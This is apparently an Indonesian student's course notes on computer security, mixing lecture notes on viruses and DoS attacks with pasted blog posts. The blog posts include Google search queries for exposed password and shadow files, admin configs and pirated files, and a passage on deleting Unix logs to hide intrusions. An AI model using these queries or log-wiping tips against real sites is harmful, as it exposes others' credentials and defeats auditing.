h1

Keamanan Sistem Komputer

November 24, 2009

KEAMANAN SISTEM KOMPUTER-RUDI LUMANTO

PERTEMUAN 1

Jawaban ditulis dalam MS Word, dgn format nama file:
TGS1-NAMA ANDA-NIM.DOC
Diterima paling lambat tgl 4 April 2009.
Persoalan :
1. Cari dan tulislah alamat website dimana anda bisa mendownload buku
: John E Caravan, “Fundamentals of Network Security”, Artech
House”
2. Tuliskan dua buah nama perusahaan di Indonesia yang memiliki
vulnerabilities dalam web server mereka, dan apa vulnerabilities
mereka ?

Perhatian :
1. Pastikan bahwa jawaban nomor 1 benar benar bisa mendownload buku
yang dimaksud
2. Pastikan bahwa file jawaban anda ketika dikirimkan sesuai dengan
format yang diminta (jika tidak sesuai format dianggap tidak
menyerahkan jawaban)

pake googlehacking

110409

Pertemuan 3

KEAMANAN SOFTWARE DARI VIRUS, WORM DLL,

Mekanisme, cara kerja dan antisipasi virus, worms, Trojan horse, bombs, trapdoor, spoofs

Pertemuan 4 google hacking

Keamanan hardware

Kasus 1

Ada persh melakukan bisnis internet memiliki databse menyimpan segal macam info custumer kredit kard punya site yang diprotec firewall. Ternyata 3 okt ada hacker masuk dan mencuri info kredit, disebar dan masukkan ke site dengan info org lain, tapi tidak bisa di claim…persh rugi besar.

Mencari tanda2 di logfile mendapat jejak bgm hacker bisa masuk

  • Server dilindungi firewall
  • Server hanya membuka koneksi internet lewat port 80
  • Server barbasis teknologi web “server side application” menggunakan CGI

Browse internet maaping internet, sekto menggunakan client server  dgn CGI. Dari info yang sebelumya tdp pertanyaan sbb :

Dilihat dari 3 sisi : yang merupakan penyebab paling besar shg bisa kebobolan

Jawaban adalah poor design

  1. Poor design

Hardware and software system that contain design flawa that can be exploited

Ext. sendmail flaws in early version of unix that allowed hackers to gain privileged root access

  1. Poor implementation

System that incorecctly configured because of in-experience, insufficient training or sloppy work.

Ex. A system that doesnot have restricted acccess privilege on critical executable file

  1. Poor management

Inadequate procedures and insufficient checks and balances

Ex. No documentation and monitoring

Bgm mempunyai kebijakan akses

Sektor mana yang mempunyai andil paling besar shg bisa di hack, dicari shg bisa dilokalisir tuk ke depan tak terulang lagi???

KASUS 2

Tiba2 server crash. Pdh disana banyak data yang berhub dengan productionline…terjadi saat melakukan rekrutmen baru dan telah dilakukan investigasi dan menemukan karyawan baru yang membawa kompie sendiri, install win2000 dan koneksi keluar menggunakan jaringan persh.

Ada kelemahan yang dimiliki oleh sistem, karena terkoneksi internet maka orang luar dapat masuk ke dalam sistem

Dimana kira2 penyebab paling besar ?? diantara pilihan diatas ?? jawaban poor management

Kasus 3

Dengan hanya teknik google hacking apa yang dapat dilakukan hacker ??

  1. Mengetahui port terbuka yang ada dalam server-> dengan port scanning
  2. Mengetahui pass dari login form web -> tidak bisa dihack
  3. Mengetahui program dan versi aplikasi web yang digunakan -> dengan index, yang bisa dilakukan google hacking
  4. Mengetahui struktur file sebuah web site -> tidak bisa dilakukan

180409

SOFTWARE THREATS

Virus, worm dan trojan, bombs, trap doors, spoofs

Virus adalah program yang dpt mereproduksi diri sendiri dengan menempel ke file yang exe shg bisa aktif dan menginfeksi file lain.

Kriteria virus

  • Memiliki kemampuan mendapatkan info, cth virus macro mencari file doc
  • Punya kemampuan utk cek file, dicek apakah sudah diinfeksi belum ?, kalo sdh tdk akan diinfeksi lagi
  • Kemampuan bereproduksi diri
  • Kemampuan utk memanipulasi, routin dari virus jika dieksekusi maka akan keluar tampilan gambar, pesan di layar.
  • Kemampuan untuk bersembunyi,  tersimpan dalam boot recod, sistem, menamakan diri dengan nama system shg tdk sadar ada virus

Siklus hidup virus

  • Sleeping phase, tidak berbahaya, tidak aktif, akan aktif jika terpenuhi kondisi tertentu
  • Active phase, mulai aktif
  • Distributing phase, mulai clonning diri, copy menginfeksi ke tempat lain atau copy ke storage
  • Acting phase, menampilkan gambar atau pesan terus menerus, ato isi hardisk tak berhenti sampai penuh

Mekanisme virus

Sample_virus.exe apa yang terjadi di display, temp folder, in registry editor : regedit

WORM

Indeendent program, didesain intun spwn untuk yang lain, bekerja dengan kompie yang berkoneksi dlm jaringan

TROJAN HORSE

Program ato kode yang bersembunyi pada progra yang lain

Beda virus ->tdk bisa menyebar kecuali dicopy, selalu menginfeksi file, susah untuk membersihkannya

Worm-> tdk menyebar, tdk modifikasi, mudah

Teknik anti vir ->

scaning -> cari karakteristik virus tuk update, lihat filenya, jika melihat hal yang sama maka ketemulah firus

integrity checking -> membandingkan di regestry, saat ada prog baru akan dicek dan dibandingkan, jika aneh maka virus ditemukan

interception-> memonitor request, jika ada request aneh dari sistem anti virus memberitahu apakah ingin dihapus ato tidak.

Ada virus yang mempunyai kemampuan seperti trojan dan worm……contoh virus melisa

250409

Search by intitle :”index of” site:co.id => untuk google hacking dibatasi untuk site perusahaan di indonesia

Tips Pencarian di google

April 6th, 2009 admin Posted in Ilmu Komputer |

Cara-cara ini adalah mengusahakan agar google menampilkan hasil yang se-spesifik mungkin, sesuai dengan kata kunci kita.- Google tidak “case sensitive”.
Keyword: linux = LINUX = LiNuX
Akan menghasilkan hal yang sama

– AND: Secara Default Google menggunakan keyword and.
Keyword: menjadi hacker
Hasilnya pencarian akan mengandung kata “menjadi” dan “hacker”

– OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah
satu dari keyword. Note: OR dituliskan dengan huruf besar semua.
Keyword: hacker OR kracker
Hasilnya pencarian akan mengandung kata “hacker” atau “kracker”

– +: Google akan mengabaikan pencarian dengan kata-kata umum seperti
“how” dan “where”. Jika kata-kata umum ini begitu penting, anda
bisa menambahkan “+” didepan keyword tersebut.
Keyword: hacker how ==> Kata “how” akan diabaikan
Keyword: hacker +how ==> Kata “how” akan diikutsertakan

– -: Tanda minus “-” bisa digunakan untuk mengecualikan kata-kata
tertentu dalam pencarian. Misal kita ingin mencari kata
“linus tanpa linux”, kita bisa menggunakan “linus -linux”

– *: Google tidak mendukung pencarian * sebagai pengganti huruf.
Misalkan kita ingin mencari dengan kata depan menja*
Google tidak mencari kata “menjamu”, “menjadi”, “menjalar”, dll
Google akan menghasilkan pencarian hanya yang mengandung kata
“menja”.

Tetapi google mendukung penggunaan * dalam pencarian kalimat.
Keyword: “menjadi * hacker”
Hasilnya pencarian dapat menghasilkan “menjadi seorang hacker”,
“menjadi white hacker”, dll.

– “”: Dapat digunakan untuk mencari kata yg lengkap.
Keyword: “menjadi hacker”
Hasilnya pencarian akan mengandung kata “menjadi hacker”

– ?: Dapat digunakan untuk mencari pada direktori Google
Keyword: ?intitle:index.of? mp3

* Tips 1: Penggunaan biasa dan penggunaan Pencarian Canggih/Advanced Search

Tips pertama adalah penggunaan google biasa. Memasukkan kata kunci yang kita cari.
Untuk mencari hasil yang lebih spesifik, dapat menggunakan Advanced Search/Pencarian
Canggih

* Tips 2: Menentukan Urutan Kata Kunci

Untuk kata tercari yang berurutan (atau disebut frasa), gunakan teknik tanda kutip :
Misal: “tempe penyet”

Anda juga dapat menggunakan lebih dari 1 kelompok frasa

Misal: “cewek cakep” “kota bandung”
Misal:”cewek cakep itu”

* Tips 3: Menentukan Format File
Untuk format/jenis file tertentu, anda dapat menambahkan kata

[katatercari] filetype:formatfile atau

[katatercari] .formatfile

contohnya:”bursa efek” filetype:PDF <=sorry kubuat gede biar gak melet
contoh lagi: “laporan keuangan” .doc

dengan menggunakan cara ini maka file yang akan ditampilkan adalah hanya file-file
dengan format yang anda tentukan saja.

Selanjutnya untuk format file anda dapat memilih seperti daftar di bawah ini:

o Microsoft Word Document => .doc
o Portable Document Format => .pdf
o Microsoft Power Point Slide => .pps
o Microsoft Power Point Presentation => .ppt
o Microsoft Excel => .xls
o Text Format => .txt
o Rich Text Format => .rtf
o Compiled HTML Help Modules => .chm
o dll sesuai dengan extensi file

Coba anda ketikkan dalam google search bar kata kata ini:
ayam jantan filetype:doc

Namun anda jangan berharap dapat menemukan file berformat .mp3, wav atau file audio
dan video dengan cara ini. Google telah melakukan block untuk jalan ini untuk menghindari
pembajakan. Namun anda masih dapat menemukannya di situs pencarian Altavista.com
Tapi dengan google pun kita masih bisa menemukannya dengan tips yang akan dijelaskan
di bawah nanti..

* Tips 4: Menentukan judul File

Anda juga dapat menentukan judul file yang anda cari, dengan menambahkan kata-kata

intitle:katakunci

Begini contohnya:

intitle:menjelajah angkasa luar

Kata intitle dapat diganti dengan allintitle

* Tips 5: Menentukan definisi suatu istilah

Gunakan kata define:kata yang dicari untuk menentukan istilah tertentu. Maka google
akan mencarikan situs yang mendefinisikan istilah tersebut.

contoh: define:schizophrenia

* Tips 6: Mengalokasikan pencarian pada lokasi tertentu

Mengalokasikan pencarian pada situs tertentu bisa dilakukan dengan cara berikut:

o Jika situs tempat pencarian sudah jelas nama hostnya
Anda dapat menggunakan kata site:kata yang di cari

Contoh:”gempa bumi” site:detik.com

o Jika nama situs masih samar

Gunakan kata inurl:kata yang dicari

Contoh “rita effendy” site:multiply.com/music

* Tips 7: Memanfaatkan index suatu direktori dalam suatu host web server

Teknik ini memanfaatkan suatu direktori webserver dengan open permission pada suatu situs
yang terindeks oleh google. Anda juga dapat mencari musik, buku, video, iso, dan lainnya
disini Hip Huraa

Apa jadinya pada halaman google jika kita lakukan pengetikan seperti ini?

intitle:”index of” mp3 “Bryan Adams”
intitle:index.of “File.exe”
intitle:index.of “music.mp3″
intitle:index.of “model.3ds”

Ya, kita bisa menuliskan intitle:”index of”kata tercari
Kata tercari itu bisa anda isikan:
o iso
o ebook atau book
o mp3, atau wav atau mp3g atau avi atau audio dll
o tgz, rar dll

* Tips 8: Memanfaatkan cache Google untuk death page

Death page adalah halaman yang sudah tidak ada/sudah terhapus atau berganti,
namun masih terindeks oleh google sebagai halaman utuh. Cirinya adalah jika
kita cari, google bisa mendapatkan result terhadap halaman itu, namun halaman
tersebut tidak bisa dibuka.

Dengan demikian kita bisa memanfaatkan salinan/cache. Dengan demikian kita akan mengambil
lagi halaman tersebut yang tersimpan di google.

tips dan trik yg lain seperti ini:

– Dalam mencari judul yang berurutan dengan kata berurutan, gunakanlah tanda petik untuk mengapit kata berurutan tsb, misal : “semesta bertasbih”.

– Spasi [space] diartikan sebagai “dan”. Misalnya dalam pencarian dokumen yang mengandung kata mp3 dan player, maka cukup mengetikan ‘mp3 player’.

– Penggunaan kata ‘or’ diartikan sebagai ‘atau’. Misal : jika ingin mencari dokumen yang mengandung salah satu kata jaringan atau komputer maka keywordnya diketik ‘jaringan or komputer’.

– Jika ingin menggunakan ekspresi yang lebih kompleks lagi dapat ditambahkan tanda kurung [()]. Misalnya untuk mencari kata dvd dan cd atau dvd dan disc, namun tidak ketiganya, maka ketik keywordnya ‘dvd (cd or disc)’.

– Minus (-) diartikan sebagai ‘bukan’. Contoh : untuk mencari kata yang mengandung kata dvd tetapi tidak terkandung kata disc maka ketiklah dvd – disc.

– Mencari buku dengan publisher tertentu, pakailah operator inpublisher : “jaringan computer” inpublisher : andi offset.

– Tanda asterik (*) untuk pencarian yang lebih spesifik, misalnya ingin mencari artikel mengenai jaringan komputer yang formatnya dalam bentuk pdf, maka ketik : ‘jaringan computer * pdf’.

– Pencarian dengan penggunaan huruf besar maupun kecil tidak akan berbeda. Ketika anda mencari dokumen yang mengandung kata ‘ilmu komputer’ maka hasilnya akan sama saja jika anda menuliskannya ‘ilmu komputer’.

– Google akan mengabaikan kata-kata “the, i, you, and, a, of, dan sebagainya. Jika ingin menggunakannya juga, gunakanlah tanda plus (+). Contoh : +the, +you.

– Panjang kalimat yang digunakan tidak boleh lebih dari 10 kata, termasuk sintaks-sintaks tambahan.

– Untuk menemukan tabel excel, gunakan perintah “ext:xls”.

– Website dengan tema-tema serupa dapat kamu temukan dengan “related”, misalnya “related:chip.co.id”.

– Menampilkan sub-site. Dengan perintah “site:chip.co.id”, google akan menampilkan semua sub-site di bawah http://www.chip.co.id. Dengan perintah ini juga, anda dapat mencari di website yang diinginkan. Misalnya, mencari “graphic card” pada website chip dengan “graphic card site:chip.co.id”.

– Memperhatikan istilah pencarian dalam url. Dengan mengetikkan “allinurl:chip” anda akan mendapatkan website yang menggunakan kata “chip” dalam alamatnya.

– Mencari istilah dalam baris judul. Dengan perintah ini anda melakukan pencarian dalam baris judul website, misalnya “allintitle:chip.co.id”.

– Menampilkan penjelasan istilah. Anda ingin tahu arti kata “mitochondria”?. Dengan “define:mitochondria” anda akan diberi daftar website yang menjelaskan istilah itu secara panjang lebar.

– mencari rangkaian bilangan dalam teks. Anda dapat menemukan music-charts terbaru dengan “allintitle:charts 1..100”.

– Memeriksa popularitas website. Semakin menarik sebuah website, semakin banyak link ke sana dari website lainnya. Untuk mengetahui siapa saja yang menyediakan link ke website pribadi anda, masukkan perintah “link:alamat website”.

– Menampilkan info film. Penggemar film yang mengerti english language bisa mendapatkan review mengenai blockbuster aktual melalui perintah “movie”. Untuk membaca review film superman yang baru misalnya ketikkan “movie:superman returns”.

– Menemukan website yang baru diindeks. Perintah ini akan menampilkan website yang diindeks. Google dalam lingkup waktu tertentu. Masukkan lingkup waktu yang diinginkan dalam cara penulisan as. Misalnya “daterange (2008-03-16)(2008-05-06)”.
Nah, gimana tips dan trik kali ini?. Semoga tips kali ini sangat bermanfaat bagi kita semua. Agar dalam menggunakan google, tidak ada lagi kesalahan.

Spionase atau hanya mendapatkan informasi lebih dengan Google?

Jump to Comments

Sering terdengar kata googling, ya sebuah kata yang sering diucapkan orang untuk memberikan isyarat bahwa hal yang sedang di perbincangkan dapat ditemukan di internet dengan bantuan mesin pencari yang beralamat di google.com. Perkembangan google yang sedemikian cepat dengan adopsi teknologi terkini membawa google menjadi yang terdepan dalam pelayanan yang tentunya terus meningkatkan jenis-jenis pelayanan, seperti gmail.con dan pembelian YouTube.com oleh google.

Dari perkembangan pemanfaatan google menjadi beragam, dari hanya sekedar untuk menemukan sebuah topik arikel hingga menggali informasi untuk spionase. Sebuah istilah yang megitu menakutkan. Ya, menakutkan memang, dimana dengan bantuan google dapat ditemukan data-data rahasia atau kode akses tertentu yang rahasia. Lalu, bagaimana menghindarkan diri dari kemungkinan spionase dengan bantuan google? jawab yang singkat dan (mungkin) tepat adalah “jangan pernah menyentuh teknologi informasi”

Sebenarnya apa yang bisa dilakukan dengan  bantuan google, kenapa banyak orang berbicara tentangnya dengan begitu hebohnya? OK, mari kita simak bagaimana menggali informasi yang tidak umum dengan cara yang tidak biasa pula. Bingung? Ya kalau biasanya cukup dengan mengetikan suatu kata atau kalimat untuk mencari inforasi yang berkaitan, kadang pencarian tidak menemukan sesuatu yang diharapkan. Disaat yang demikian perlu dilakukan pencarian dengan memberikan perintah khusus kepada google. Apakah perintah itu?

Intitle: Subject merupakan perintah untuk menemukan informasi judul dari topik yang mengikutinya.
Contoh : intitle: pwd administrator
Pencarian akan dilakukan pada halaman yang mengandung judul pwd dan menjadikan kata administrator sebagai kata kunci prioritas

Contoh penggunaan lain:
intitle:”Index of” .sh_history
intitle:”Index of” .bash_history
intitle:”index of” passwd
intitle:”index of” people.lst
intitle:”index of” pwd.db
intitle:”index of” etc/shadow
intitle:”index of” spwd
intitle:”index of” master.passwd
intitle:”index of” htpasswd
intitle:”index of” members OR accounts
intitle:”index of” user_carts OR user_cart

allintitle:Subject merupakan perintah pencarian untuk menemukan informasi judul dari topik yang mengikutinya yang mengandung dua atau lebih kata kunci prioritas
Contoh : allintitle: anjing kucing tikus
Pencarian akan di batasi pada informasi yang mengandung kata anjing, kucing dan tikus

Contoh spionase : allinurl:winnt/system32/ google akan menampilkan daftar semua informasi pada server yang memberikan akses pada direktori yang terlarang seperti system32. Terkadang akan didapat akses pada cmd.exe pada direktori system32 yang memungkinkan seseorang untuk mengambil alih kendali sistem pada server tersebut.

Contoh penggunaan lain :
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
allintitle:*.php?filename=*
allintitle:*.php?page=*
allintitle:*.php?logon=*

inurl:subject ialah perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian.

Contoh : inurl:database mdb. Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang database mdb

Contoh spionase : inurl:config.txt akan menampilkan informasi link pada suatu server yang memberikan akses pada file config.txt. File ini berisi informasi penting termasuk hash value dari password administrator dan proses autentifikasi dari suatu database. woww..!!

Atau contoh lain :
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt

allinurl:subject perintah untuk mendapatkan list url yang terdapat dua query pencarian utama.

Contoh pencarian allinurl:etc/passwd , pencarian akan menghasilkan URL yang mengandung informasi tentang etc dan passwd. Tanda garis miring slash (“/”) antara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.

site:Subject merupakan syntax untuk membatasi pecarian informasi pada domain atau situs tertentu saja. Perintah ini cocok bila terdapat fokus pencarian pada suatu sumber, sehingga informasi yang ditampikan tidak terlalu banyak sehingga kemungkinan terjadi pembiasan.

Contoh : gempa site:detik.com Syntax diatas untuk mencari informasi/berita tentang gempa yang hanya tersedia di situs detik.com

cache:Subject merupakan perintah untuk melihat daftar alamat/link subject yang sudah di rekam (index) oleh mesin pencari google. saya menyarankan bila anda seorang administrator untuk meluangkan waktu untuk melakukan perintah ini terhadap domain/host/situs yang anda kelola, siapa nyana kalau link rahasia anda pun telah terindex oleh google, itu artinya bahaya sedang mengintai anda.

Contoh: cache:detik.com, hasil pencarian akan memperlihatkan daftar link pada situs detik.com yang telah di rekam (index) oleh google, bila berminat dengan salah satu link yang tampil maka klik saja dan informasi yang dimaksud sudah dapat dinikmati.

filetype:Subject merupakan perintah pada Google untuk pencarian informasi file dengan ekstensi tertentu, seperti .doc, .xls, .pdf, .txt, .mdb, dll.
Contoh : filetype:txt site:co.id passwd

Pencarian akan menghasilkan link file yang berexntensi .txt pada semua situs co.id yang yang didalamnya terdapat informasi passwd.

Atau kita akan mencari contoh CV milik orang lain yang mungkin bisa digunakan contekan untuk membuat CV untuk keperluan mencari kerja. Dapat digunakan perintah ini:
filetype:doc “curriculum vitae”

link:Subject merupakan perintah yang dimengerti oleh google untuk menampilkan informasi link/tautan ke situs yang menjadi subject. Misalnya ingin mencari tau situs-situs mana saja yang telah melakukan linking/tautan ke situs linux.or.id
Contoh: link:www.linux.or.id

Maka akan di tampilkan daftar situs-situs yang melakukan tautan ke situs linux.or.id

related:subject merupakan perintah yang akan memberikan daftar situs mirip/serupa dengan situs yang menjadi subjek pencarian. Hal ini sering diperlukan dimana informasi yang diperoleh dari satu situs belum memberi kepuasan atau sesuai dengan yang diinginkan, maka pencarian informasi serupa di situs lain yang serupa di perlukan, sehingga informasi yang diperoleh lebih lengkap sesuai dengan keinginan.
Contoh: related:www.jasakom.com

Pencarian akan memberi daftar situs-situs yang serupa/mirip dengan situs jasakom.com.

Beberapa query sintaks diatas akan sangat membantu dalam pencarian data dan informasi lebih detail. Google dapat menjadi mesin pencari untuk menggali informasi tertentu dan rahasia, informasi yang tidak diperkirakan yang dapat memberitahukan sisi lemah suatu sistem. Hal tersebut yang dimanfaatkan oleh sebagian individu untuk melakukan penetrasi suatu server atau sistem informasi .

Index of merupakan peintah yang dapat digunakan untuk menemukan situs-situs yang menampilkan indeks browsing direktori alias daftar file yang terdappat didalam sebuah webserver yang dapat diakses. Seringkali file-file yang cukup penting tidak sengaja diletakkan sembarangan dlam webserver.
Contoh :
Index of /admin
Index of /administrator
Index of /pwd
Index of /passwd
Index of /password
“Index of /” +mp3 “iwan fals”
“Index of /” +”vista crack”
“Index of /” +password.txt
“Index of /” +.htaccess
“Index of /secret”

Google untuk keperluan tertentu:

mp3 “rapidshare.de/files” site:rapidshare.de
mencari file mp3 di situs rapidshare.de

pdf “rapidshare.de/files” site:rapidshare.de
mencari buku atau file pdf di rapidshare.de

+inurl:exe|rar|zip site:rapidshare.de
mencari program, aplikasi di rapidshare.de

define:merdeka
mencari tahu definisi dari kata merdeka, hal ini sering diperlukan untuk mengetahui arti atau definisidari sebuah kata atu ungkapan.

123+456 atau 123*456 atau 10% of 1234
Memanfaatkan google sebagai kalkulator

I’m Feeling Lucky?
Tab I’m Feeling Lucky yang ada di homepage Google mungkin akan sangat berguna bagi Anda yang tak berlama-lama membaca hasil pencarian yang dikeluarkan Google satu persatu alias langsung to the poin saja. Masukkan kata yang akan cari, lalu klik tombol I’m Feeling Lucky?, maka Google akan meringkas daftar hasil pencarian yang sangat panjang. Anda akan diantarkan langsung ke halaman web yang paling sesuai.

news “gempa sumatera”
mencai berita tentang gempa yangterjadi disumatera

1 usd in idr
mencari nilai tukar rupiah terhadap dolar

pictures dian
mencari gambar dengan berhubungan dengan kata dian

weather palembang
mencari informasi tentang keadaan cuaca kota Palembang

====================

Bahasan : serangan di internet (denial of service : dos) membuat orang tidak dapat mengakses dalam sebuah server

Dalam jaringan adanya client dan server….program2 yang disediakan server dimana program tsb saat dijalan akan membuat suatu kios layanan. Kios disebut dengan pond…

Khusus web kios 80 , jika ingin mengakses ato beli barang harus hub ke port 80,

Port2nya banyak, email, ftp, telnet, news

Semakin besar skala perusahaannya maka satu server disediakan untuk web

Untuk persh yang pas2an….cukup untuk 1 server tuk segala servise

APA, TUJUAN, TIPE DOS., PENYERANG, TINDAKAN

Dos ->

Microsoft pernah mengalami thn 2003 pd tv aljazera website diserang dengan dos shg selama 1 jam tidak bisa diakses.

Apa serangan dos a dalah serangan shg seseorang terhindar dari sistem, membuat user tidak legitimate, membuat server hang….cth.perusahaan pizza hut menerima order via telp, agar yang order terhambat tdk bisa telp, cara telp berbarengan 100 orang Cuma buat tanya2 dan tidak order. Terus menerus , akibatnya orang yang bener2 pesan pizza tidak bisa order. Maka pizza hut akan rugi, tuk penerima telp sebaiknya langsung dimatikan saja.

Tujuan dos -> bagaimana cranya menghindarkan legitimate user untuk tidak mendapatkan pelayanan. Ada yang di stop ditengah jalan. Ato diberikan info yang lain

Karakteristik serangan.

  1. Membanjiri networknya
  2. Mengganggu koneksi antara mesin
  3. Menganggu langsung ke cliennya
  4. Mengganggu servicenya, shg tidak bisa melayani lagi

Tipe dos

  1. Dos
  • Smurf and fraggle

Menggunakan saat mengirim paket data otomtis yang menerima akan membalas, ketika host kiri ip paket maka akan di reply kembali ke pengirimnya, dan memakai 3 elemen, attacker, amolifying, network, target

Menyerang icmp echo yang sudah di spoof, ada frame, data didalamnya yang menerangkan data pengirim, dibuat seolah2 datang dari target sistem.

Karena dikirm ke echo paket, maka syste address akan mengirim kembali krn didefinisikan tuk kirim ulang, jika mengirimkan spoof ke jaringan yang memp 100 jaringan, maka dos attack akan tercipta 100x

Mengirimkan 1 sinyal ke dalam jaringan dan di multiple sebanyak jml host yang dipunya

Fraggle dengan UDP

Smurg dengan ICMP

Ct.

  1. penyerang mengirimkan 768 kbs , paket , dengan kirim enantukan dulu bounce site, punya 50 host, jika setiap host mengambil paketnya, berapa yang akan diterima oleh target, 768×50
    1. Jika mengirim zombie ke 300 system dengan modes 25 kbps,Berarti 3000 x 25.000
  • Buffer overflow

Memanfaatkan program yang menunggu adanya input dari user. Hampir semua server memuat program tsb yang rentan dengan buffer overflow

Dilakukan saat memasukkan info dengan mengisi inputan yang melebihi space yang sudah ditentukan, ct masukkan 5 padahal space hanya 3, membuat flow program mengeksekusi program yang lain.

Ct. mengirimkan attachment dengan 256 karakter, bisa menulis banyak karakter, untuk membuat serangan buffer.

Buffer adalah sebuah tempat dimana menarus sesuatu, vriabel atau data, jika masukkan 1 karakter disediakan 1 box..5 data 5 box

Box tsb dinamakan buffer penyimpan

Jika ada data yang mengisi box yang sudah ditentukan, tapi isi datanya lebih besar..

–          Menyimpan 10 integer tapi penyerang memasukkan 11 integer. Membuat eksekusi di sekitar buffer.

Kenapa jadi masalah sekuriti ? krn data overflow dpt menjadi bermacam2

Ct. integer 0 berarti untuk mengeksekusi dan tidak bisa mengakses. Dengan hacker mengirimkan lebih maka 0 bisa berubh menjadi 1

Karakter root juga bisa membuat buffer

Dianggap sbg pointer dan bisa mengeksekusi program yang lain. Bisa mengakibatkan program menjadi crash dan tidak bisa berjalan layanannya.

Untuk mencegah :

–          Seharusnya programmer mengecek ukuran buffer dari suatu data

–          Penggunaan bhs c/c++ otomatis di cek batasan buffer

CASE STUDY…

code red

  • -> menimbulkan kerugian yang cukup besar, mengexploitasi buffer yang ada di microsoft IIS server, menyerang situs web dalam bahasa inggris, dan dapat merubah suatu tampilan suatu site, menyerang ke kantor presiden us
    • membuat back door shg dipublikasikan, shg semua orang bisa menyerang server melalui internet.

CODE red terjadi saat mengirim web page menggunakan request ke server, disimpan dalam ASCII. Mengirim reques kembali.

Sistem yang banyak kelemahan kemungkinan untuk di tambal, sistem admin harus tau kelemahannya

  • Ping of death

Adalah singkatan packet internet groper merupakan tool internet program , dapat mengecek jaringan kita on atau tidak. Dapat cek interprise network, kecepatan jaringan yang menyambung ke kompie kita, ping bekerja dengnan mengirim paket icmp ke target.

Ping digunakan untuk keperluan lain dpt menjadi serangan server.

Tujuan utama dengan memperbesar size menjadi paket yang besar menyebabkan os jadi crash

Membuat fragmen ip, memecah menjadi beberapa segmen. Jumlahnya banyak sekali melebihi totl size, ditambahkan tidak sama dengan batasan yangdiset pd kompie, krn berlebih dan tidak bisa dihandle menyebabkan crash

  • Syn

Menggunakan aturan yang normal dalam tcpip menggunakan three way handshake : client mengirim server jawab kirim ulang client mengirimkan data. Ternyata dapat dieksploitasi shg menjadi menghambat sebuah layanan.

Terjadi krn : server saat menerima paket syn akan menerbitkan syn ack, mengirimkan synack dan menyimpan dalam blacklog (buffer). Yang normal saat di blacklog akan hilang dan kosong lagi, krn di spoof maka client akan mengirim syn terus shg akan bertumpuk di bcklog, maka jika muncul sinyal baru akan diabaikan krn sudah penuh, akibatnya layanan tidak bisa diakses.

  • Teadrop attact / the unnamed attact

Menggunakan  ip reques dalam paket yang terlalu besar dalam router, membut bingung dalam nilainya,

Ada udp menggunakan overlapping offset untuk membuat server down

  • Tribal dop

Merupakan bentuk paralel dari teardrop attack, ada komputer yang digunakan, banyak komputer yang digunakan dan menyarang dengan mempergunakan bandwith yang dipecah

  1. Ddos distributed dos attack -> skala besar

Juga merupakan perkembangan dan skala besar dari dof yag memebuat para kalangan sekuriti, ada serangan yang menghajar 13 root server dns yang memuat domain name service antar pengguna internet di seluruh dunia.

Meskipun serangan dilakukan 1 jam yang lalu dan efeknya hampir tidak bisa ditandai oleh interenet user, menyebabkan 7 dari 13 root server akan mati.

Biasanya layanan yang akan diserang adalah layanan yang ada dalam primari target. Disebut target utama, dan kedua disebut secondary target. Krn ada 2 layer sering susah untuk cek asal serangan krn menggunakan banyak ip address… susah dihadang krn sudah tuk dilacak ataupun di blok.

Tipe doss

  • Agent handler => menyerang langsung dengan hirarki yang dpt terlihat
  • Irc based model =>  jaringan publik yang akan menyerang banyak user dan membina berbagai macam agent sudah deteksi krn banyak irc

secondary digunakan sebagai target, hacker membuat berbagai server, lalu master yang menjadi agent akan langsung diserang.

Ddos attack taxonomy

Melakukan tindakan sebelum serangan, saat dan setelah terjadi serangan.

Ddos countermeasure

  • Mendeteksi , menetralisasi handlers dan menghindarkan terjadinya secondary viktif,
  • Mendeteksi dan menghindarkan potensial attack, dan menghentikan setiap request
  • Menyamarkan penyerangannya, honeypots setiap serangan dibiarkan dan di pelajari, shg dapt mematikannya, honey sebagai server umpan
  • Menganalisa stl terjadinya serangan, melihat log

Sabtu depan uts…semua ada, open file

menghapus jejak meninggalkanmu
Oleh bungaputri
Published: Januari 19, 2009
Updated: Januari 27, 2009

JHehehehe,..mo tanya, ini kaya judul lagunya band apa yach???
Upst,.tapi ada hubungannya loh lagu diatas sama masalah hacking pada mesin *nix, loh..loh..loh..lagu sama hacking,dimana bunga hubungannya???

Okey deyh,daripada bunga dibilang size bajunya L alias Lebai , langsung ajah deyh di ulas dikit-dikit.

.log file ??? ini sebuah file yang berisi tentang catatan apapun yang dilakukan oleh siapapun dalam sebuah mesin. Untuk bisa mengakses ini yang dibutuhkan adalah anda sebagai root/SU. File ini bisa dibuka atau diedit dengan cara menggunakan text editor dan hexa editor sesuai dengan jenis/macamnya. Loh kok macamnya??? Emangnya ada berapa macam yang sich log file itu???

Ini macem ato jenis dari dari file log itu, tapi kalo ada kesalahan mohon maaf dan di koreksi yach temen-temen,bunga masih belajar

1. .history: mencatat semua hal yang dilakukan oleh user, biasanya tersimpan dalam directory user. Sangat mudah dihapus ato di edit, asalkan kita sebagai SU statusnya.
2. acct ato pact: mencatat semua hal yang dilakukan oleh user, tetapi tidak mencatat program yang dijalankan oleh user, ini hanya catatan harian sebuah mesin, jadi ukuran file bisa bertambah besar setiap harinya. Biasanya terletak pada /var/adm/savacct.
3. access_log: mencatat access file pada www seperti: pemanggilan hostname, remote login, waktu access dan perintah-perintah pada http, digunakan pada NCSA httpd server. Biasanya berupa text biasa, sangat mudah diedit hanya menggunakan text editor.
4. aculog: mencatat pemakaian modem.
5. lastlog: mencatat user yang login,baik yang masuk ato gagal login. Didalemnya terekam IP address dari user tersebut.sangat mudah dihapus,pake coomannd ajah lsg terhapus kok.
6. loginlog: mencatat hanya user yang gagal login biasanya setelah 5 kali percobaan gagal login baru tercatat. Bentuknya hanya file text bisa, jadi sangat mudah dihapus ato diedit.
7. messages: mencatat hasil apapun yang dikeluarkan oleh syslog. Bentuknya hanya file text bisa, jadi sangat mudah dihapus ato diedit.
8. sulog: mencatat apapun yang dilakukan oleh su. Bentuknya hanya file text bisa, jadi sangat mudah dihapus ato diedit.
